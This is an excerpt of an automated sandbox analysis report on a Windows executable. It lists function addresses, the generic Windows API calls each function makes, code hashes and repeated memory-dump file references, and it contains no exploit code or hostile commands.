String ID:
API String ID: 3677997916-0
Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D

Function 00406559 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
GetProcAddress.KERNEL32(00000000,?), ref: 00406586

Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D

Function 00405D58 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405D5C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Function 00405D33 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98

Function 0040582E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405834
GetLastError.KERNEL32 ref: 00405842

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00405E0A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,004032EF,0040CEF0,?,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69

Function 00405DDB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4

Function 00404293 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D

Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
